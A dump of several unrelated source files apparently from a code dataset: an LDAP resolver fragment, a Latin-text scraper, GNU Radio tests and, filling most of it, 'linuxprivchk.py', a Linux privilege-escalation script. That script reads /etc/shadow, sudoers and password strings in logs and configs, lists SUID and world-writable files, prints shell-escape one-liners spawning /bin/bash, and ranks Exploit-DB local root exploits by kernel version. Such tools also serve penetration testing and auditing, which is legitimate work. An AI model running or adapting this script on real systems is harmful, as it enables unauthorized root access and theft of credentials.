password=password,
auto_bind=auto_bind,
client_strategy=client_strategy,
authentication=authentication,
check_names=check_names,
# receive_timeout=receive_timeout,
auto_referrals=auto_referrals)
elif authtype == AUTHTYPE.SASL_DIGEST_MD5: # pragma: no cover
if not authentication:
authentication = ldap3.SASL
password = to_utf8(password)
sasl_credentials = (str(user), str(password))
l = ldap3.Connection(server,
sasl_mechanism="DIGEST-MD5",
sasl_credentials=sasl_credentials,
auto_bind=auto_bind,
client_strategy=client_strategy,
authentication=authentication,
check_names=check_names,
# receive_timeout=receive_timeout,
auto_referrals=auto_referrals)
else:
raise Exception("Authtype {0!s} not supported".format(authtype))
if start_tls:
l.open(read_server_info=False)
log.debug("Doing start_tls")
r = l.start_tls(read_server_info=False)
return l
@property
def editable(self):
"""
Return true, if the instance of the resolver is configured editable
:return:
"""
# Depending on the database this might look different
# Usually this is "1"
return is_true(self._editable)
| agpl-3.0 | -6,267,946,050,107,101,000 | 37.796089 | 110 | 0.532508 | false |
blindfuzzy/LHF | Tools/linuxprivchk.py | 1 | 25080 | #!/usr/bin/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
##-------------------------------------------------------------------------------------------------------------
## [Warning]:
## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates,
## I did not write it to be efficient and in some cases you may find the functions may not produce the desired
## results. For example, the function that links packages to running processes is based on keywords and will
## not always be accurate. Also, the exploit list included in this function will need to be updated over time.
## Feel free to change or improve it any way you see fit.
##-------------------------------------------------------------------------------------------------------------
## [Modification, Distribution, and Attribution]:
## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
## worth anything anyway :)
###############################################################################################################
# conditional import for older versions of python not compatible with subprocess
try:
import subprocess as sub
compatmode = 0 # newer version of python, no need for compatibility mode
except ImportError:
import os # older version of python, need to use os instead
compatmode = 1
# title / formatting
bigline = "================================================================================================="
smlline = "-------------------------------------------------------------------------------------------------"
print bigline
print "LINUX PRIVILEGE ESCALATION CHECKER"
print bigline
print
# loop through dictionary, execute the commands, store the results, return updated dict
def execCmd(cmdDict):
for item in cmdDict:
cmd = cmdDict[item]["cmd"]
if compatmode == 0: # newer version of python, use preferred subprocess
out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate()
results = out.split('\n')
else: # older version of python, use os.popen
echo_stdout = os.popen(cmd, 'r')
results = echo_stdout.read().split('\n')
cmdDict[item]["results"]=results
return cmdDict
# print results for each previously executed command, no return value
def printResults(cmdDict):
for item in cmdDict:
msg = cmdDict[item]["msg"]
results = cmdDict[item]["results"]
print "[+] " + msg
for result in results:
if result.strip() != "":
print " " + result.strip()
print
return
def writeResults(msg, results):
f = open("privcheckout.txt", "a");
f.write("[+] " + str(len(results)-1) + " " + msg)
for result in results:
if result.strip() != "":
f.write(" " + result.strip())
f.close()
return
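# Editorial note (not in the original script): additional checks can be added
# by following the same dict-of-commands pattern used below, e.g.:
#
#   sshInfo = {"SSHKEYS": {"cmd": "ls -la ~/.ssh 2>/dev/null",
#                          "msg": "SSH files readable by the current user",
#                          "results": results}}
#   sshInfo = execCmd(sshInfo)
#   printResults(sshInfo)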
# Basic system info
print "[*] GETTING BASIC SYSTEM INFO...\n"
results=[]
sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results},
"KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results},
"HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results}
}
sysInfo = execCmd(sysInfo)
printResults(sysInfo)
# Networking Info
print "[*] GETTING NETWORKING INFO...\n"
netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results},
"ROUTE":{"cmd":"route", "msg":"Route", "results":results},
"NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results}
}
netInfo = execCmd(netInfo)
printResults(netInfo)
# File System Info
print "[*] GETTING FILESYSTEM INFO...\n"
driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results},
"FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results}
}
driveInfo = execCmd(driveInfo)
printResults(driveInfo)
# Scheduled Cron Jobs
cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results},
"CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results}
}
cronInfo = execCmd(cronInfo)
printResults(cronInfo)
# User Info
print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n"
userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results},
"ID":{"cmd":"id","msg":"Current User ID", "results":results},
"ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results},
"SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results},
"HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results},
"ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results},
"SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results},
"LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results}
}
userInfo = execCmd(userInfo)
printResults(userInfo)
if "root" in userInfo["ID"]["results"][0]:
print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n"
# File/Directory Privs
print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
"WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
"SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
"ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results}
}
fdPerms = execCmd(fdPerms)
printResults(fdPerms)
pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results},
"CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results},
"SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results}
}
pwdFiles = execCmd(pwdFiles)
printResults(pwdFiles)
# Processes and Applications
print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n"
if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]:
getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian
else:
getPkgs = "rpm -qa | sort -u" # RH/other
getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results},
"PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results}
}
getAppProc = execCmd(getAppProc)
printResults(getAppProc) # comment to reduce output
otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results},
"APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results},
"APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results}
}
otherApps = execCmd(otherApps)
printResults(otherApps)
print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n"
# find the package information for the processes currently running
# under root or another super user
procs = getAppProc["PROCS"]["results"]
pkgs = getAppProc["PKGS"]["results"]
supusers = userInfo["SUPUSERS"]["results"]
procdict = {} # dictionary to hold the processes running as super users
for proc in procs: # loop through each process
relatedpkgs = [] # list to hold the packages related to a process
try:
for user in supusers: # loop through the known super users
if (user != "") and (user in proc): # if the process is being run by a super user
procname = proc.split(" ")[4] # grab the process name
if "/" in procname:
splitname = procname.split("/")
procname = splitname[len(splitname)-1]
for pkg in pkgs: # loop through the packages
if not len(procname) < 3: # name too short to get reliable package results
if procname in pkg:
if procname in procdict:
relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
if pkg not in relatedpkgs:
relatedpkgs.append(pkg) # add pkg to the list
procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry
except:
pass
for key in procdict:
print " " + key # print the process name
try:
if not procdict[key][0] == "": # only print the rest if related packages were found
print " Possible Related Packages: "
for entry in procdict[key]:
print " " + entry # print each related package
except:
pass
# EXPLOIT ENUMERATION
# First discover the available tools
print
print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n"
devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}}
devTools = execCmd(devTools)
printResults(devTools)
print "[+] Related Shell Escape Sequences...\n"
escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
for cmd in escapeCmd:
for result in devTools["TOOLS"]["results"]:
if cmd in result:
for item in escapeCmd[cmd]:
print " " + cmd + "-->\t" + item
print
print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n"
# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), 'mnt', and 'os'
sploits= { "2.2.x-2.4.x ptrace kmod local exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}},
"<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}},
"2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}},
"Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}},
"2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}},
"'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}},
"<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}},
"Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}},
"< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}},
"open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
}
# variable declaration
os = sysInfo["OS"]["results"][0]
version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0]
langs = devTools["TOOLS"]["results"]
procs = getAppProc["PROCS"]["results"]
kernel = str(sysInfo["KERNEL"]["results"][0])
mount = driveInfo["MOUNT"]["results"]
#pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit applicability but may in future
# lists to hold ranked, applicable sploits
# note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks
# all applicable exploits should be checked and this function could probably use some improvement
avgprob = []
highprob = []
for sploit in sploits:
lang = 0 # use to rank applicability of sploits
keyword = sploits[sploit]["keywords"]["val"]
sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"]
    # first check for kernel applicability
if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
# next check language applicability
if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
lang = 1 # language found, increase applicability score
elif sploits[sploit]["lang"] == "sh":
lang = 1 # language found, increase applicability score
elif (sploits[sploit]["lang"] in str(langs)):
lang = 1 # language found, increase applicability score
if lang == 0:
sploitout = sploitout + "**" # added mark if language not detected on system
# next check keyword matches to determine if some sploits have a higher probability of success
for loc in sploits[sploit]["keywords"]["loc"]:
if loc == "proc":
for proc in procs:
if keyword in proc:
highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
break
break
elif loc == "os":
if (keyword in os) or (keyword in kernel):
highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
break
elif loc == "mnt":
if keyword in mount:
highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
break
else:
avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!"
print
print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system"
for exploit in highprob:
print " - " + exploit
print
print " The following exploits are applicable to this kernel version and should be investigated as well"
for exploit in avgprob:
print " - " + exploit
print
print "Finished"
print bigline
| gpl-3.0 | 6,533,771,653,508,868,000 | 66.601078 | 248 | 0.614872 | false |
oudalab/phyllo | phyllo/extractors/regula_ad_monachoDB.py | 1 | 3765 | import sqlite3
import urllib
import re
from urllib.request import urlopen
from bs4 import BeautifulSoup
# several names in the <pagehead> but not sure what to put as an author name
def main():
# The collection URL below.
collURL = 'http://www.thelatinlibrary.com/regula.html'
collOpen = urllib.request.urlopen(collURL)
collSOUP = BeautifulSoup(collOpen, 'html5lib')
author = "unknown"
colltitle = collSOUP.title.string.strip()
date = "no date found"
textsURL = [collURL]
with sqlite3.connect('texts.db') as db:
c = db.cursor()
c.execute(
'CREATE TABLE IF NOT EXISTS texts (id INTEGER PRIMARY KEY, title TEXT, book TEXT,'
' language TEXT, author TEXT, date TEXT, chapter TEXT, verse TEXT, passage TEXT,'
' link TEXT, documentType TEXT)')
c.execute("DELETE FROM texts WHERE title = 'REGULA AD MONACHOS I'")
c.execute("DELETE FROM texts WHERE title = 'SS. PATRUM REGULA AD MONACHOS II.'")
c.execute("DELETE FROM texts WHERE title = 'SS. PATRUM REGULA AD MONACHOS III.'")
c.execute("DELETE FROM texts WHERE title = 'REGULA ORIENTALIS\nEX PATRUM ORIENTALIUM REGULIS COLLECTA'")
for url in textsURL:
chapter = "Preface"
verse = 0
title = "REGULA AD MONACHOS I"
openurl = urllib.request.urlopen(url)
textsoup = BeautifulSoup(openurl, 'html5lib')
getp = textsoup.find_all('p')
for p in getp:
# make sure it's not a paragraph without the main text
try:
if p['class'][0].lower() in ['border', 'pagehead', 'shortborder', 'smallborder', 'margin',
                                             'internal_navigation']:  # these are not part of the main text
continue
except:
pass
verses = []
text = p.get_text()
text = text.strip()
if p.find('b') is not None:
if text.startswith("SS.") or text.startswith("REGULA"):
# this is the title of a new work
title = text
chapter = -1
continue
else:
if text.startswith("CAPUT"):
chapter = text
print(chapter)
verse = 0
continue
else:
chapter = chapter + ": " + text
continue
if title == "REGULA AD MONACHOS I":
verses.append(text)
elif text.startswith("PRAEFATIO"):
chapter = text
verse = 0
continue
elif re.match('[IVXL]+\.', text):
chapter = text.split(" ")[0].strip()
print(chapter)
verse = 0
text = text.replace(chapter, '')
verses.append(text)
else:
verses.append(text)
for v in verses:
if v.startswith('Christian'):
continue
if v is None or v == '' or v.isspace():
continue
# verse number assignment.
verse += 1
c.execute("INSERT INTO texts VALUES (?,?,?,?,?,?,?, ?, ?, ?, ?)",
(None, colltitle, title, 'Latin', author, date, chapter,
verse, v, url, 'prose'))
if __name__ == '__main__':
main()
| apache-2.0 | 730,117,628,980,353,400 | 36.277228 | 112 | 0.468526 | false |
no-net/gr-winelo | python/qa_winelo_mpc_channel_cc.py | 1 | 2465 | #!/usr/bin/env python
#
# Copyright 2012 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
#
from gnuradio import gr, gr_unittest
import winelo_swig
class qa_mpc_channel_cc(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_001(self):
src_data = (1, 2, 3, 4, 5)
src_gauss_ch1 = (2, 2, 1, 1, 2)
expected_result = (2, 4, 3, 4, 10)
src0 = gr.vector_source_c(src_data)
src1 = gr.vector_source_c(src_gauss_ch1)
mpc_channel = winelo_swig.mpc_channel_cc((0,), (1,))
sink = gr.vector_sink_c()
# set up fg
self.tb.connect(src0, (mpc_channel, 0))
self.tb.connect(src1, (mpc_channel, 1))
self.tb.connect(mpc_channel, sink)
self.tb.run()
# check data
result_data = sink.data()
self.assertFloatTuplesAlmostEqual(expected_result, result_data, 6)
def test_002(self):
src_data = (1, 0, 0, 0, 0)
src_gauss_ch1 = (1, 1, 1, 1, 1)
src_gauss_ch2 = (1, 1, 1, 1, 1)
expected_result = (1, 0, 0, 0.707106781, 0)
src0 = gr.vector_source_c(src_data)
src1 = gr.vector_source_c(src_gauss_ch1)
src2 = gr.vector_source_c(src_gauss_ch2)
mpc_channel = winelo_swig.mpc_channel_cc((0, 3), (1, 0.5))
sink = gr.vector_sink_c()
# set up fg
self.tb.connect(src0, (mpc_channel, 0))
self.tb.connect(src1, (mpc_channel, 1))
self.tb.connect(src2, (mpc_channel, 2))
self.tb.connect(mpc_channel, sink)
self.tb.run()
# check data
result_data = sink.data()
self.assertFloatTuplesAlmostEqual(expected_result, result_data, 6)
if __name__ == '__main__':
gr_unittest.main()
